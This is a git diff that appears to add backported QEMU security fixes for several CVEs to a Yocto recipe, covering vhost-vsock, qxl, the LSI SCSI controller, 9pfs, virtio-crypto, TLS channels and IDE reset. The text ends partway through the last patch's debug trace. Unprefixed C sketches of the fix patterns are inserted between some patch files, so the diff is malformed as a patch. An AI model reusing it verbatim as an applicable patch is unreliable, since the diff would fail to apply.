diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2022-26354.patch b/meta/recipes-devtools/qemu/qemu/CVE-2022-26354.patch
new file mode 100644
index 0000000000..fc4d6cf3df
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2022-26354.patch
@@ -0,0 +1,57 @@
+Backport of:
+
+From 8d1b247f3748ac4078524130c6d7ae42b6140aaf Mon Sep 17 00:00:00 2001
+From: Stefano Garzarella <sgarzare@redhat.com>
+Date: Mon, 28 Feb 2022 10:50:58 +0100
+Subject: [PATCH] vhost-vsock: detach the virqueue element in case of error
+
+In vhost_vsock_common_send_transport_reset(), if an element popped from
+the virtqueue is invalid, we should call virtqueue_detach_element() to
+detach it from the virtqueue before freeing its memory.
+
+Fixes: fc0b9b0e1c ("vhost-vsock: add virtio sockets device")
+Fixes: CVE-2022-26354
+Cc: qemu-stable@nongnu.org
+Reported-by: VictorV <vv474172261@gmail.com>
+Signed-off-by: Stefano Garzarella <sgarzare@redhat.com>
+Message-Id: <20220228095058.27899-1-sgarzare@redhat.com>
+Reviewed-by: Stefan Hajnoczi <stefanha@redhat.com>
+Reviewed-by: Michael S. Tsirkin <mst@redhat.com>
+Signed-off-by: Michael S. Tsirkin <mst@redhat.com>
+
+CVE: CVE-2022-26354
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2022-26354.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/8d1b247f3748ac4078524130c6d7ae42b6140aaf ]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/virtio/vhost-vsock-common.c | 10 +++++++---
+ 1 file changed, 7 insertions(+), 3 deletions(-)
+
+--- a/hw/virtio/vhost-vsock.c
++++ b/hw/virtio/vhost-vsock.c
+@@ -221,19 +221,23 @@ static void vhost_vsock_send_transport_r
+ if (elem->out_num) {
+ error_report("invalid vhost-vsock event virtqueue element with "
+ "out buffers");
+- goto out;
++ goto err;
+ }
+
+ if (iov_from_buf(elem->in_sg, elem->in_num, 0,
+ &event, sizeof(event)) != sizeof(event)) {
+ error_report("vhost-vsock event virtqueue element is too short");
+- goto out;
++ goto err;
+ }
+
+ virtqueue_push(vq, elem, sizeof(event));
+ virtio_notify(VIRTIO_DEVICE(vsock), vq);
+
+-out:
++ g_free(elem);
++ return;
++
++err:
++ virtqueue_detach_element(vq, elem, 0);
+ g_free(elem);
+ }
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2022-35414.patch b/meta/recipes-devtools/qemu/qemu/CVE-2022-35414.patch
new file mode 100644
index 0000000000..4196ebcf98
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2022-35414.patch
@@ -0,0 +1,53 @@
+From 09a07b5b39c87423df9e8f6574c19a14d36beac5 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Wed, 27 Jul 2022 10:34:12 +0530
+Subject: [PATCH] CVE-2022-35414
+
+Upstream-Status: Backport [https://github.com/qemu/qemu/commit/418ade7849ce7641c0f7333718caf5091a02fd4c]
+CVE: CVE-2022-35414
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ exec.c | 13 ++++++++++++-
+ 1 file changed, 12 insertions(+), 1 deletion(-)
+
+diff --git a/exec.c b/exec.c
+index 43c70ffb..2d6add46 100644
+--- a/exec.c
++++ b/exec.c
+@@ -685,7 +685,7 @@ static void tcg_iommu_free_notifier_list(CPUState *cpu)
+
+ /* Called from RCU critical section */
+ MemoryRegionSection *
+-address_space_translate_for_iotlb(CPUState *cpu, int asidx, hwaddr addr,
++address_space_translate_for_iotlb(CPUState *cpu, int asidx, hwaddr orig_addr,
+ hwaddr *xlat, hwaddr *plen,
+ MemTxAttrs attrs, int *prot)
+ {
+@@ -694,6 +694,7 @@ address_space_translate_for_iotlb(CPUState *cpu, int asidx, hwaddr addr,
+ IOMMUMemoryRegionClass *imrc;
+ IOMMUTLBEntry iotlb;
+ int iommu_idx;
++ hwaddr addr = orig_addr;
+ AddressSpaceDispatch *d = atomic_rcu_read(&cpu->cpu_ases[asidx].memory_dispatch);
+
+ for (;;) {
+@@ -737,6 +738,16 @@ address_space_translate_for_iotlb(CPUState *cpu, int asidx, hwaddr addr,
+ return section;
+
+ translate_fail:
++ /*
++ * We should be given a page-aligned address -- certainly
++ * tlb_set_page_with_attrs() does so. The page offset of xlat
++ * is used to index sections[], and PHYS_SECTION_UNASSIGNED = 0.
++ * The page portion of xlat will be logged by memory_region_access_valid()
++ * when this memory access is rejected, so use the original untranslated
++ * physical address.
++ */
++ assert((orig_addr & ~TARGET_PAGE_MASK) == 0);
++ *xlat = orig_addr;
+ return &d->map.sections[PHYS_SECTION_UNASSIGNED];
+ }
+ #endif
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2022-4144.patch b/meta/recipes-devtools/qemu/qemu/CVE-2022-4144.patch
new file mode 100644
index 0000000000..3f0d5fbd5c
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2022-4144.patch
@@ -0,0 +1,103 @@
+From 6dbbf055148c6f1b7d8a3251a65bd6f3d1e1f622 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Philippe=20Mathieu-Daud=C3=A9?= <philmd@linaro.org>
+Date: Mon, 28 Nov 2022 21:27:40 +0100
+Subject: [PATCH] hw/display/qxl: Avoid buffer overrun in qxl_phys2virt
+ (CVE-2022-4144)
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Have qxl_get_check_slot_offset() return false if the requested
+buffer size does not fit within the slot memory region.
+
+Similarly qxl_phys2virt() now returns NULL in such case, and
+qxl_dirty_one_surface() aborts.
+
+This avoids buffer overrun in the host pointer returned by
+memory_region_get_ram_ptr().
+
+Fixes: CVE-2022-4144 (out-of-bounds read)
+Reported-by: Wenxu Yin (@awxylitol)
+Resolves: https://gitlab.com/qemu-project/qemu/-/issues/1336
+
+Signed-off-by: Philippe Mathieu-Daudé <philmd@linaro.org>
+Signed-off-by: Stefan Hajnoczi <stefanha@redhat.com>
+Message-Id: <20221128202741.4945-5-philmd@linaro.org>
+
+Upstream-Status: Backport [https://gitlab.com/qemu-project/qemu/-/commit/6dbbf055148c6f1b7d8a3251a65bd6f3d1e1f622]
+CVE: CVE-2022-4144
+Comments: Deleted the patch hunk in qxl.h, as it contains a change
+in comments that is not present in the current version of qemu.
+
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ hw/display/qxl.c | 27 +++++++++++++++++++++++----
+ 1 file changed, 23 insertions(+), 4 deletions(-)
+
+diff --git a/hw/display/qxl.c b/hw/display/qxl.c
+index cd7eb39d..6bc8385b 100644
+--- a/hw/display/qxl.c
++++ b/hw/display/qxl.c
+@@ -1440,11 +1440,13 @@ static void qxl_reset_surfaces(PCIQXLDevice *d)
+
+ /* can be also called from spice server thread context */
+ static bool qxl_get_check_slot_offset(PCIQXLDevice *qxl, QXLPHYSICAL pqxl,
+- uint32_t *s, uint64_t *o)
++ uint32_t *s, uint64_t *o,
++ size_t size_requested)
+ {
+ uint64_t phys = le64_to_cpu(pqxl);
+ uint32_t slot = (phys >> (64 - 8)) & 0xff;
+ uint64_t offset = phys & 0xffffffffffff;
++ uint64_t size_available;
+
+ if (slot >= NUM_MEMSLOTS) {
+ qxl_set_guest_bug(qxl, "slot too large %d >= %d", slot,
+@@ -1468,6 +1470,23 @@ static bool qxl_get_check_slot_offset(PCIQXLDevice *qxl, QXLPHYSICAL pqxl,
+ slot, offset, qxl->guest_slots[slot].size);
+ return false;
+ }
++ size_available = memory_region_size(qxl->guest_slots[slot].mr);
++ if (qxl->guest_slots[slot].offset + offset >= size_available) {
++ qxl_set_guest_bug(qxl,
++ "slot %d offset %"PRIu64" > region size %"PRIu64"\n",
++ slot, qxl->guest_slots[slot].offset + offset,
++ size_available);
++ return false;
++ }
++ size_available -= qxl->guest_slots[slot].offset + offset;
++ if (size_requested > size_available) {
++ qxl_set_guest_bug(qxl,
++ "slot %d offset %"PRIu64" size %zu: "
++ "overrun by %"PRIu64" bytes\n",
++ slot, offset, size_requested,
++ size_requested - size_available);
++ return false;
++ }
+
+ *s = slot;
+ *o = offset;
+@@ -1486,7 +1505,7 @@ void *qxl_phys2virt(PCIQXLDevice *qxl, QXLPHYSICAL pqxl, int group_id)
+ offset = le64_to_cpu(pqxl) & 0xffffffffffff;
+ return (void *)(intptr_t)offset;
+ case MEMSLOT_GROUP_GUEST:
+- if (!qxl_get_check_slot_offset(qxl, pqxl, &slot, &offset)) {
++ if (!qxl_get_check_slot_offset(qxl, pqxl, &slot, &offset, size)) {
+ return NULL;
+ }
+ ptr = memory_region_get_ram_ptr(qxl->guest_slots[slot].mr);
+@@ -1944,9 +1963,9 @@ static void qxl_dirty_one_surface(PCIQXLDevice *qxl, QXLPHYSICAL pqxl,
+ uint32_t slot;
+ bool rc;
+
+- rc = qxl_get_check_slot_offset(qxl, pqxl, &slot, &offset);
+- assert(rc == true);
+ size = (uint64_t)height * abs(stride);
++ rc = qxl_get_check_slot_offset(qxl, pqxl, &slot, &offset, size);
++ assert(rc == true);
+ trace_qxl_surfaces_dirty(qxl->id, offset, size);
+ qxl_set_dirty(qxl->guest_slots[slot].mr,
+ qxl->guest_slots[slot].offset + offset,
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2023-0330.patch b/meta/recipes-devtools/qemu/qemu/CVE-2023-0330.patch
new file mode 100644
index 0000000000..26e22b4c31
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2023-0330.patch
@@ -0,0 +1,77 @@
+[Ubuntu note: remove fuzz-lsi53c895a-test.c changes since the file does not
+ exist for this release]
+From b987718bbb1d0eabf95499b976212dd5f0120d75 Mon Sep 17 00:00:00 2001
+From: Thomas Huth <thuth@redhat.com>
+Date: Mon, 22 May 2023 11:10:11 +0200
+Subject: [PATCH] hw/scsi/lsi53c895a: Fix reentrancy issues in the LSI
+ controller (CVE-2023-0330)
+
+We cannot use the generic reentrancy guard in the LSI code, so
+we have to manually prevent endless reentrancy here. The problematic
+lsi_execute_script() function has already a way to detect whether
+too many instructions have been executed - we just have to slightly
+change the logic here that it also takes into account if the function
+has been called too often in a reentrant way.
+
+The code in fuzz-lsi53c895a-test.c has been taken from an earlier
+patch by Mauro Matteo Cascella.
+
+Resolves: https://gitlab.com/qemu-project/qemu/-/issues/1563
+Message-Id: <20230522091011.1082574-1-thuth@redhat.com>
+Reviewed-by: Stefan Hajnoczi <stefanha@redhat.com>
+Reviewed-by: Alexander Bulekov <alxndr@bu.edu>
+Signed-off-by: Thomas Huth <thuth@redhat.com>
+
+Reference: https://launchpad.net/ubuntu/+source/qemu/1:4.2-3ubuntu6.27
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2023-0330.patch?h=ubuntu/focal-security
+Upstream commit https://gitlab.com/qemu-project/qemu/-/commit/b987718bbb1d0eabf95499b976212dd5f0120d75]
+CVE: CVE-2023-0330
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ hw/scsi/lsi53c895a.c | 23 +++++++++++++++------
+ tests/qtest/fuzz-lsi53c895a-test.c | 33 ++++++++++++++++++++++++++++++
+ 2 files changed, 50 insertions(+), 6 deletions(-)
+
+--- qemu-4.2.orig/hw/scsi/lsi53c895a.c
++++ qemu-4.2/hw/scsi/lsi53c895a.c
+@@ -1135,15 +1135,24 @@ static void lsi_execute_script(LSIState
+ uint32_t addr, addr_high;
+ int opcode;
+ int insn_processed = 0;
++ static int reentrancy_level;
++
++ reentrancy_level++;
+
+ s->istat1 |= LSI_ISTAT1_SRUN;
+ again:
+- if (++insn_processed > LSI_MAX_INSN) {
+- /* Some windows drivers make the device spin waiting for a memory
+- location to change. If we have been executed a lot of code then
+- assume this is the case and force an unexpected device disconnect.
+- This is apparently sufficient to beat the drivers into submission.
+- */
++ /*
++ * Some windows drivers make the device spin waiting for a memory location
++ * to change. If we have executed more than LSI_MAX_INSN instructions then
++ * assume this is the case and force an unexpected device disconnect. This
++ * is apparently sufficient to beat the drivers into submission.
++ *
++ * Another issue (CVE-2023-0330) can occur if the script is programmed to
++ * trigger itself again and again. Avoid this problem by stopping after
++ * being called multiple times in a reentrant way (8 is an arbitrary value
++ * which should be enough for all valid use cases).
++ */
++ if (++insn_processed > LSI_MAX_INSN || reentrancy_level > 8) {
+ if (!(s->sien0 & LSI_SIST0_UDC)) {
+ qemu_log_mask(LOG_GUEST_ERROR,
+ "lsi_scsi: inf. loop with UDC masked");
+@@ -1597,6 +1606,8 @@ again:
+ }
+ }
+ trace_lsi_execute_script_stop();
++
++ reentrancy_level--;
+ }
+
+ static uint8_t lsi_reg_readb(LSIState *s, int offset)
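A compact sketch of the guard pattern the patch above relies on: a depth counter incremented on entry and decremented on exit bounds how often the function may re-enter itself. run_script() and MAX_REENTRANCY are illustrative names, not QEMU identifiers:

    #include <stdio.h>

    #define MAX_REENTRANCY 8

    static void run_script(void)
    {
        static int reentrancy_level;

        reentrancy_level++;

        for (;;) {
            if (reentrancy_level > MAX_REENTRANCY) {
                fprintf(stderr, "script re-entered too often, forcing stop\n");
                break;
            }
            /*
             * ... execute one scripted instruction; device emulation may call
             * back into run_script() from here, which is what the guard bounds.
             */
            break; /* placeholder so this sketch terminates */
        }

        reentrancy_level--;
    }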
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2023-2861.patch b/meta/recipes-devtools/qemu/qemu/CVE-2023-2861.patch
new file mode 100644
index 0000000000..70b7d6c562
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2023-2861.patch
@@ -0,0 +1,178 @@
+From f6b0de53fb87ddefed348a39284c8e2f28dc4eda Mon Sep 17 00:00:00 2001
+From: Christian Schoenebeck <qemu_oss@crudebyte.com>
+Date: Wed, 7 Jun 2023 18:29:33 +0200
+Subject: [PATCH] 9pfs: prevent opening special files (CVE-2023-2861)
+
+The 9p protocol does not specifically define how a server shall behave when
+a client tries to open a special file; however, from a security POV it does
+make sense for a 9p server to prohibit opening any special file on the host
+side in general. A sane Linux 9p client, for instance, would never attempt
+to open a special file on the host side; it would always handle those
+exclusively on its guest side. A malicious client, however, could
+potentially escape from the exported 9p tree by creating and opening a
+device file on the host side.
+
+With QEMU this could only be exploited in the following unsafe setups:
+
+ - Running QEMU binary as root AND 9p 'local' fs driver AND 'passthrough'
+ security model.
+
+or
+
+ - Using 9p 'proxy' fs driver (which is running its helper daemon as
+ root).
+
+These setups were already discouraged for safety reasons before;
+however, for obvious reasons we are now tightening behaviour on this.
+
+Fixes: CVE-2023-2861
+Reported-by: Yanwu Shen <ywsPlz@gmail.com>
+Reported-by: Jietao Xiao <shawtao1125@gmail.com>
+Reported-by: Jinku Li <jkli@xidian.edu.cn>
+Reported-by: Wenbo Shen <shenwenbo@zju.edu.cn>
+Signed-off-by: Christian Schoenebeck <qemu_oss@crudebyte.com>
+Reviewed-by: Greg Kurz <groug@kaod.org>
+Reviewed-by: Michael Tokarev <mjt@tls.msk.ru>
+Message-Id: <E1q6w7r-0000Q0-NM@lizzy.crudebyte.com>
+
+Upstream-Status: Backport [https://gitlab.com/qemu-project/qemu/-/commit/f6b0de53fb87ddefed348a39284c8e2f28dc4eda]
+CVE: CVE-2023-2861
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ fsdev/virtfs-proxy-helper.c | 27 +++++++++++++++++++++++--
+ hw/9pfs/9p-util.h | 40 +++++++++++++++++++++++++++++++++++++
+ 2 files changed, 65 insertions(+), 2 deletions(-)
+
+diff --git a/fsdev/virtfs-proxy-helper.c b/fsdev/virtfs-proxy-helper.c
+index 6f132c5f..300c9765 100644
+--- a/fsdev/virtfs-proxy-helper.c
++++ b/fsdev/virtfs-proxy-helper.c
+@@ -26,6 +26,7 @@
+ #include "qemu/xattr.h"
+ #include "9p-iov-marshal.h"
+ #include "hw/9pfs/9p-proxy.h"
++#include "hw/9pfs/9p-util.h"
+ #include "fsdev/9p-iov-marshal.h"
+
+ #define PROGNAME "virtfs-proxy-helper"
+@@ -350,6 +351,28 @@ static void resetugid(int suid, int sgid)
+ }
+ }
+
++/*
++ * Open regular file or directory. Attempts to open any special file are
++ * rejected.
++ *
++ * returns file descriptor or -1 on error
++ */
++static int open_regular(const char *pathname, int flags, mode_t mode)
++{
++ int fd;
++
++ fd = open(pathname, flags, mode);
++ if (fd < 0) {
++ return fd;
++ }
++
++ if (close_if_special_file(fd) < 0) {
++ return -1;
++ }
++
++ return fd;
++}
++
+ /*
+ * send response in two parts
+ * 1) ProxyHeader
+@@ -694,7 +717,7 @@ static int do_create(struct iovec *iovec)
+ if (ret < 0) {
+ goto unmarshal_err_out;
+ }
+- ret = open(path.data, flags, mode);
++ ret = open_regular(path.data, flags, mode);
+ if (ret < 0) {
+ ret = -errno;
+ }
+@@ -719,7 +742,7 @@ static int do_open(struct iovec *iovec)
+ if (ret < 0) {
+ goto err_out;
+ }
+- ret = open(path.data, flags);
++ ret = open_regular(path.data, flags, 0);
+ if (ret < 0) {
+ ret = -errno;
+ }
+diff --git a/hw/9pfs/9p-util.h b/hw/9pfs/9p-util.h
+index 546f46dc..79fdd2a3 100644
+--- a/hw/9pfs/9p-util.h
++++ b/hw/9pfs/9p-util.h
+@@ -13,12 +13,16 @@
+ #ifndef QEMU_9P_UTIL_H
+ #define QEMU_9P_UTIL_H
+
++#include "qemu/error-report.h"
++
+ #ifdef O_PATH
+ #define O_PATH_9P_UTIL O_PATH
+ #else
+ #define O_PATH_9P_UTIL 0
+ #endif
+
++#define qemu_fstat fstat
++
+ static inline void close_preserve_errno(int fd)
+ {
+ int serrno = errno;
+@@ -26,6 +30,38 @@ static inline void close_preserve_errno(int fd)
+ errno = serrno;
+ }
+
++/**
++ * close_if_special_file() - Close @fd if neither regular file nor directory.
++ *
++ * @fd: file descriptor of open file
++ * Return: 0 on regular file or directory, -1 otherwise
++ *
++ * CVE-2023-2861: Prohibit opening any special file directly on host
++ * (especially device files), as a compromised client could potentially gain
++ * access outside exported tree under certain, unsafe setups. We expect
++ * client to handle I/O on special files exclusively on guest side.
++ */
++static inline int close_if_special_file(int fd)
++{
++ struct stat stbuf;
++
++ if (qemu_fstat(fd, &stbuf) < 0) {
++ close_preserve_errno(fd);
++ return -1;
++ }
++ if (!S_ISREG(stbuf.st_mode) && !S_ISDIR(stbuf.st_mode)) {
++ error_report_once(
++ "9p: broken or compromised client detected; attempt to open "
++ "special file (i.e. neither regular file, nor directory)"
++ );
++ close(fd);
++ errno = ENXIO;
++ return -1;
++ }
++
++ return 0;
++}
++
+ static inline int openat_dir(int dirfd, const char *name)
+ {
+ return openat(dirfd, name,
+@@ -56,6 +92,10 @@ again:
+ return -1;
+ }
+
++ if (close_if_special_file(fd) < 0) {
++ return -1;
++ }
++
+ serrno = errno;
+ /* O_NONBLOCK was only needed to open the file. Let's drop it. We don't
+ * do that with O_PATH since fcntl(F_SETFL) isn't supported, and openat()
+--
+2.25.1
+
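For context, a self-contained sketch of the open-then-verify pattern applied by the patch above: open first, fstat() the descriptor, and reject anything that is neither a regular file nor a directory, which avoids the TOCTOU race a stat()-before-open() check would have. open_regular_or_dir() is an illustrative name:

    #include <errno.h>
    #include <fcntl.h>
    #include <sys/stat.h>
    #include <unistd.h>

    /* Open the path, then verify via fstat() that it refers to a regular
     * file or a directory; anything else (device node, FIFO, socket) is
     * closed and rejected. */
    static int open_regular_or_dir(const char *path, int flags, mode_t mode)
    {
        struct stat st;
        int fd = open(path, flags, mode);

        if (fd < 0) {
            return fd;
        }
        if (fstat(fd, &st) < 0) {
            int saved = errno;
            close(fd);
            errno = saved;
            return -1;
        }
        if (!S_ISREG(st.st_mode) && !S_ISDIR(st.st_mode)) {
            close(fd);
            errno = ENXIO;
            return -1;
        }
        return fd;
    }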
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2023-3180.patch b/meta/recipes-devtools/qemu/qemu/CVE-2023-3180.patch
new file mode 100644
index 0000000000..7144bdca46
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2023-3180.patch
@@ -0,0 +1,49 @@
+From 9d38a8434721a6479fe03fb5afb150ca793d3980 Mon Sep 17 00:00:00 2001
+From: zhenwei pi <pizhenwei@bytedance.com>
+Date: Thu, 3 Aug 2023 10:43:13 +0800
+Subject: [PATCH] virtio-crypto: verify src&dst buffer length for sym request
+
+For symmetric algorithms, the length of the ciphertext must be the same
+as that of the plaintext.
+The missing verification of src_len and dst_len in
+virtio_crypto_sym_op_helper() may lead to a buffer overflow or data leak.
+
+This patch was originally written by Yiming Tao for QEMU-SECURITY and is
+resent here (with a few changes to the error message) in qemu-devel.
+
+Fixes: CVE-2023-3180
+Fixes: 04b9b37edda("virtio-crypto: add data queue processing handler")
+Cc: Gonglei <arei.gonglei@huawei.com>
+Cc: Mauro Matteo Cascella <mcascell@redhat.com>
+Cc: Yiming Tao <taoym@zju.edu.cn>
+Signed-off-by: zhenwei pi <pizhenwei@bytedance.com>
+Message-Id: <20230803024314.29962-2-pizhenwei@bytedance.com>
+Reviewed-by: Michael S. Tsirkin <mst@redhat.com>
+Signed-off-by: Michael S. Tsirkin <mst@redhat.com>
+
+Upstream-Status: Backport from [https://gitlab.com/qemu-project/qemu/-/commit/9d38a8434721a6479fe03fb5afb150ca793d3980]
+CVE: CVE-2023-3180
+Signed-off-by: Ashish Sharma <asharma@mvista.com>
+
+ hw/virtio/virtio-crypto.c | 5 +++++
+ 1 file changed, 5 insertions(+)
+
+diff --git a/hw/virtio/virtio-crypto.c b/hw/virtio/virtio-crypto.c
+index 44faf5a522b..13aec771e11 100644
+--- a/hw/virtio/virtio-crypto.c
++++ b/hw/virtio/virtio-crypto.c
+@@ -634,6 +634,11 @@ virtio_crypto_sym_op_helper(VirtIODevice *vdev,
+ return NULL;
+ }
+
++ if (unlikely(src_len != dst_len)) {
++ virtio_error(vdev, "sym request src len is different from dst len");
++ return NULL;
++ }
++
+ max_len = (uint64_t)iv_len + aad_len + src_len + dst_len + hash_result_len;
+ if (unlikely(max_len > vcrypto->conf.max_size)) {
+ virtio_error(vdev, "virtio-crypto too big length");
+--
+GitLab
+
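A minimal sketch of the validation the patch above adds (names and structure simplified; sym_request_lengths_ok() is illustrative, not the QEMU helper):

    #include <stdbool.h>
    #include <stdint.h>

    /* For symmetric ciphers the source and destination buffers must have the
     * same length, and the total request must stay below the device limit. */
    static bool sym_request_lengths_ok(uint64_t src_len, uint64_t dst_len,
                                       uint64_t iv_len, uint64_t aad_len,
                                       uint64_t hash_len, uint64_t max_size)
    {
        if (src_len != dst_len) {
            return false;   /* ciphertext length must match plaintext length */
        }
        return iv_len + aad_len + src_len + dst_len + hash_len <= max_size;
    }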
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2023-3354.patch b/meta/recipes-devtools/qemu/qemu/CVE-2023-3354.patch
new file mode 100644
index 0000000000..2942e84cac
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2023-3354.patch
@@ -0,0 +1,87 @@
+From 10be627d2b5ec2d6b3dce045144aa739eef678b4 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Daniel=20P=2E=20Berrang=C3=A9?= <berrange@redhat.com>
+Date: Tue, 20 Jun 2023 09:45:34 +0100
+Subject: [PATCH] io: remove io watch if TLS channel is closed during handshake
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+The TLS handshake may take some time to complete, during which time an
+I/O watch might be registered with the main loop. If the owner of the
+I/O channel invokes qio_channel_close() while the handshake is waiting
+to continue, the I/O watch must be removed. Failing to remove it will
+later trigger the completion callback which the owner is not expecting
+to receive. In the case of the VNC server, this results in a SEGV as
+vnc_disconnect_start() tries to shutdown a client connection that is
+already gone / NULL.
+
+CVE-2023-3354
+Reported-by: jiangyegen <jiangyegen@huawei.com>
+Signed-off-by: Daniel P. Berrangé <berrange@redhat.com>
+
+Upstream-Status: Backport [https://gitlab.com/qemu-project/qemu/-/commit/10be627d2b5ec2d6b3dce045144aa739eef678b4]
+CVE: CVE-2023-3354
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+---
+ include/io/channel-tls.h | 1 +
+ io/channel-tls.c | 18 ++++++++++++------
+ 2 files changed, 13 insertions(+), 6 deletions(-)
+
+diff --git a/include/io/channel-tls.h b/include/io/channel-tls.h
+index fdbdf12f..e49e2831 100644
+--- a/include/io/channel-tls.h
++++ b/include/io/channel-tls.h
+@@ -49,6 +49,7 @@ struct QIOChannelTLS {
+ QIOChannel *master;
+ QCryptoTLSSession *session;
+ QIOChannelShutdown shutdown;
++ guint hs_ioc_tag;
+ };
+
+ /**
+diff --git a/io/channel-tls.c b/io/channel-tls.c
+index 7ec8ceff..8b32fbde 100644
+--- a/io/channel-tls.c
++++ b/io/channel-tls.c
+@@ -194,12 +194,13 @@ static void qio_channel_tls_handshake_task(QIOChannelTLS *ioc,
+ }
+
+ trace_qio_channel_tls_handshake_pending(ioc, status);
+- qio_channel_add_watch_full(ioc->master,
+- condition,
+- qio_channel_tls_handshake_io,
+- data,
+- NULL,
+- context);
++ ioc->hs_ioc_tag =
++ qio_channel_add_watch_full(ioc->master,
++ condition,
++ qio_channel_tls_handshake_io,
++ data,
++ NULL,
++ context);
+ }
+ }
+
+@@ -214,6 +215,7 @@ static gboolean qio_channel_tls_handshake_io(QIOChannel *ioc,
+ QIOChannelTLS *tioc = QIO_CHANNEL_TLS(
+ qio_task_get_source(task));
+
++ tioc->hs_ioc_tag = 0;
+ g_free(data);
+ qio_channel_tls_handshake_task(tioc, task, context);
+
+@@ -371,6 +373,10 @@ static int qio_channel_tls_close(QIOChannel *ioc,
+ {
+ QIOChannelTLS *tioc = QIO_CHANNEL_TLS(ioc);
+
++ if (tioc->hs_ioc_tag) {
++ g_clear_handle_id(&tioc->hs_ioc_tag, g_source_remove);
++ }
++
+ return qio_channel_close(tioc->master, errp);
+ }
+
+--
+2.25.1
+
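The fix follows a common GLib pattern: remember the source tag when the watch is registered, clear it in the callback, and remove the source on close so the callback can never run against a torn-down object. A minimal sketch using an illustrative HandshakeState in place of QIOChannelTLS:

    #include <glib.h>

    typedef struct {
        guint hs_tag;   /* non-zero while a handshake I/O watch is registered */
    } HandshakeState;

    static gboolean handshake_cb(gpointer data)
    {
        HandshakeState *s = data;

        s->hs_tag = 0;              /* the source is gone once we return */
        /* ... continue the handshake here ... */
        return G_SOURCE_REMOVE;
    }

    static void handshake_arm(HandshakeState *s)
    {
        /* stand-in for qio_channel_add_watch_full() */
        s->hs_tag = g_idle_add(handshake_cb, s);
    }

    static void handshake_close(HandshakeState *s)
    {
        /* remove the pending watch so the callback can never fire later */
        if (s->hs_tag) {
            g_clear_handle_id(&s->hs_tag, g_source_remove);
        }
    }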
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2023-5088.patch b/meta/recipes-devtools/qemu/qemu/CVE-2023-5088.patch
new file mode 100644
index 0000000000..db02210fa4
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2023-5088.patch
@@ -0,0 +1,114 @@
+From 7d7512019fc40c577e2bdd61f114f31a9eb84a8e Mon Sep 17 00:00:00 2001
+From: Fiona Ebner <f.ebner@proxmox.com>
+Date: Wed, 6 Sep 2023 15:09:21 +0200
+Subject: [PATCH] hw/ide: reset: cancel async DMA operation before resetting
+ state
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+If there is a pending DMA operation during ide_bus_reset(), the fact
+that the IDEState is already reset before the operation is canceled
+can be problematic. In particular, ide_dma_cb() might be called and
+then use the reset IDEState which contains the signature after the
+reset. When used to construct the IO operation, this leads to
+ide_get_sector() returning 0 and nsector being 1. This is particularly
+bad, because a write command will thus destroy the first sector, which
+often contains a partition table or similar.
+
+Traces showing the unsolicited write happening with IDEState
+0x5595af6949d0 being used after reset:
+
+> ahci_port_write ahci(0x5595af6923f0)[0]: port write [reg:PxSCTL] @ 0x2c: 0x00000300
+> ahci_reset_port ahci(0x5595af6923f0)[0]: reset port
+> ide_reset IDEstate 0x5595af6949d0
+> ide_reset IDEstate 0x5595af694da8
+> ide_bus_reset_aio aio_cancel
+> dma_aio_cancel dbs=0x7f64600089a0
+> dma_blk_cb dbs=0x7f64600089a0 ret=0
+> dma_complete dbs=0x7f64600089a0 ret=0 cb=0x5595acd40b30
+> ahci_populate_sglist ahci(0x5595af6923f0)[0]
+> ahci_dma_prepare_buf ahci(0x5595af6923f0)[0]: prepare buf limit=512 prepared=512
+> ide_dma_cb IDEState 0x5595af6949d0; sector_num=0 n=1 cmd=DMA WRITE
+> dma_blk_io dbs=0x7f6420802010 bs=0x5595ae2c6c30 offset=0 to_dev=1
+> dma_blk_cb dbs=0x7f6420802010 ret=0
+
+> (gdb) p *qiov
+> $11 = {iov = 0x7f647c76d840, niov = 1, {{nalloc = 1, local_iov = {iov_base = 0x0,
+> iov_len = 512}}, {__pad = "\001\000\000\000\000\000\000\000\000\000\000",
+> size = 512}}}
+> (gdb) bt
+> #0 blk_aio_pwritev (blk=0x5595ae2c6c30, offset=0, qiov=0x7f6420802070, flags=0,
+> cb=0x5595ace6f0b0 <dma_blk_cb>, opaque=0x7f6420802010)
+> at ../block/block-backend.c:1682
+> #1 0x00005595ace6f185 in dma_blk_cb (opaque=0x7f6420802010, ret=<optimized out>)
+> at ../softmmu/dma-helpers.c:179
